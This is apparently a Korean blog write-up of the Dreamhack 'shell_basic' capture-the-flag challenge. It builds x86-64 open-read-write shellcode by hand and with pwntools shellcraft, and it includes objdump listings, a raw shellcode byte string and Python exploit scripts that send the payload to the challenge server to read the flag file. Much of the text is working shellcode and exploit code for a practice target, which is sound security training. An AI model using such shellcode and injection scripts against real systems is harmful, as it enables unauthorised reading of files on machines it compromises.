고정 헤더 영역
상세 컨텐츠
본문
728x90
반응형
풀이 1
filename를 16진수로 구하기
section .data
filename db '/home/shell_basic/flag_name_is_loooooong', 0
mode dq 0 ; O_RDONLY
- 먼저 asm 파일에 위와 같이 filename을 적는 어셈블리 코드를 작성
nasm -f elf64 shell_basic.asm # 운영체제 elf64 지정하여 어셈블리 코드로 object 파일 생성
objcopy --dump-section .text=shell_basic.bin shell_basic.o # object 파일로 실행 파일 생성
$ objdump -D shell_basic.o
shell_basic.o: file format elf64-x86-64
Disassembly of section .data:
0000000000000000 <filename>:
0: 2f (bad)
1: 68 6f 6d 65 2f pushq $0x2f656d6f
6: 73 68 jae 70 <mode+0x47>
8: 65 6c gs insb (%dx),%es:(%rdi)
a: 6c insb (%dx),%es:(%rdi)
b: 5f pop %rdi
c: 62 61 (bad)
e: 73 69 jae 79 <mode+0x50>
10: 63 2f movslq (%rdi),%ebp
12: 66 6c data16 insb (%dx),%es:(%rdi)
14: 61 (bad)
15: 67 5f addr32 pop %rdi
17: 6e outsb %ds:(%rsi),(%dx)
18: 61 (bad)
19: 6d insl (%dx),%es:(%rdi)
1a: 65 5f gs pop %rdi
1c: 69 73 5f 6c 6f 6f 6f imul $0x6f6f6f6c,0x5f(%rbx),%esi
23: 6f outsl %ds:(%rsi),(%dx)
24: 6f outsl %ds:(%rsi),(%dx)
25: 6f outsl %ds:(%rsi),(%dx)
26: 6e outsb %ds:(%rsi),(%dx)
27: 67 00 add %al,(%eax)
- objdump 명령어로 filename의 16진수 형태 확인 가능. little endian이므로 0x67\x6e\x6f ~ \x68\x2f 순서로 filename을 구한다.
- 구한 filename을 open의 인자로 넣어줘야 한다.
nasm -f elf64 shellcode.asm
section .text
global _start
_start:
push 0x0 ; empty string for filename
mov rax, 0x676e6f6f6f6f6f6f
push rax
mov rax, 0x6c5f73695f656d61
push rax
mov rax, 0x6e5f67616c662f63
push rax
mov rax, 0x697361625f6c6c65
push rax
mov rax, 0x68732f656d6f682f
push rax
; open(filename, O_RDONLY)
mov rdi, rsp ; mov filename to rdi
xor rsi, rsi ; rsi = 0 O_RDONLY
xor rax, rax
mov rax, 0x2
syscall
; read(fd, buf, 0x30)
mov rdi, rax
sub rsi, 0x30 ; rsi = buf
mov rdx, 0x30 ; rdx = 0x30
mov rax, 0x0 ; syscall read
syscall
; write(1, buf, 0x30)
mov rdi, 1 ; rdi = 1
mov rax, 0x1 ; syscall write
syscall
; exit(0)
xor rdi, rdi
mov rax, 0x3c
syscallobjdump -D shellcode.o
shellcode.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 6a 00 pushq $0x0
2: 48 b8 6f 6f 6f 6f 6f movabs $0x676e6f6f6f6f6f6f,%rax
9: 6f 6e 67
c: 50 push %rax
d: 48 b8 61 6d 65 5f 69 movabs $0x6c5f73695f656d61,%rax
14: 73 5f 6c
17: 50 push %rax
18: 48 b8 63 2f 66 6c 61 movabs $0x6e5f67616c662f63,%rax
1f: 67 5f 6e
22: 50 push %rax
23: 48 b8 65 6c 6c 5f 62 movabs $0x697361625f6c6c65,%rax
2a: 61 73 69
2d: 50 push %rax
2e: 48 b8 2f 68 6f 6d 65 movabs $0x68732f656d6f682f,%rax
35: 2f 73 68
38: 50 push %rax
39: 48 89 e7 mov %rsp,%rdi
3c: 48 31 f6 xor %rsi,%rsi
3f: 48 31 c0 xor %rax,%rax
42: b8 02 00 00 00 mov $0x2,%eax
47: 0f 05 syscall
49: 48 89 c7 mov %rax,%rdi
4c: 48 83 ee 30 sub $0x30,%rsi
50: ba 30 00 00 00 mov $0x30,%edx
55: b8 00 00 00 00 mov $0x0,%eax
5a: 0f 05 syscall
5c: bf 01 00 00 00 mov $0x1,%edi
61: b8 01 00 00 00 mov $0x1,%eax
66: 0f 05 syscall
68: 48 31 ff xor %rdi,%rdi
6b: b8 3c 00 00 00 mov $0x3c,%eax
70: 0f 05 syscall- 16진수를 \x6a부터 0x05까지 차례로 작성하면 shellcode 완성
#!/usr/bin/python3
from pwn import *
context.log_level = 'debug'
p = remote('host3.dreamhack.games', 11531)
context.arch = 'amd64'
payload = b"\x6a\x00\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xc0\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05"
p.sendlineafter('shellcode: ', payload)
print(p.recv())쉘코드가 잘못되었는지 그냥 exit됨..
풀이 2: pwntool의 shellcraft를 이용하여 shellcode 구성
#!/usr/bin/python3
from pwn import *
context.log_level = 'debug'
p = remote('host3.dreamhack.games', 11531)
context.arch = 'amd64'
flag = '/home/shell_basic/flag_name_is_loooooong'
# open('/home/shell_basic/flag_name_is_loooooong')
shellcode = shellcraft.open(flag)
# read(fd, buf, 0x30)
shellcode += shellcraft.read('rax', 'rsp', 0x30)
# write(stdout, buf, 0x30)
shellcode += shellcraft.write(1, 'rsp', 0x30)
shellcode = asm(shellcode)
p.sendlineafter('shellcode: ', shellcode)
print(p.recv())
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
.p2align 0
/* open(file='/home/shell_basic/flag_name_is_loooooong', oflag=0, mode=0) */
/* push b'/home/shell_basic/flag_name_is_loooooong\\x00' */
push 1
dec byte ptr [rsp]
mov rax, 0x676e6f6f6f6f6f6f
push rax
mov rax, 0x6c5f73695f656d61
push rax
mov rax, 0x6e5f67616c662f63
push rax
mov rax, 0x697361625f6c6c65
push rax
mov rax, 0x68732f656d6f682f
push rax
mov rdi, rsp
xor edx, edx /* 0 */
xor esi, esi /* 0 */
/* call open() */
push 2 /* 2 */
pop rax
syscall
/* call read('rax', 'rsp', 0x30) */
mov rdi, rax
xor eax, eax /* SYS_read */
push 0x30
pop rdx
mov rsi, rsp
syscall
/* write(fd=1, buf='rsp', n=0x30) */
push 1
pop rdi
push 0x30
pop rdx
mov rsi, rsp
/* call write() */
push 1 /* 1 */
pop rax
syscall
위와 같은 파이썬 exploit 코드를 실행하면, shellcraft로 구성한 쉘코드가 어셈블리 코드 형태로 구성이 되고, 해당 어셈블리 코드가 문제의 shellcode: 이후의 입력으로 전달되어 flag 파일을 열고 flag를 읽을 수 있다.
728x90
반응형
'SYSTEM HACKING > Dreamhack' 카테고리의 다른 글
| [Dreamhack] bof (0) | 2024.02.16 |
|---|---|
| [Dreamhack] pwn-library (0) | 2024.01.10 |
| [Dreamhack] master_canary (0) | 2022.01.05 |
| [Dreamhack] welcome (0) | 2021.02.09 |
| [Dreamhack] tcache_dup2 (0) | 2020.08.29 |
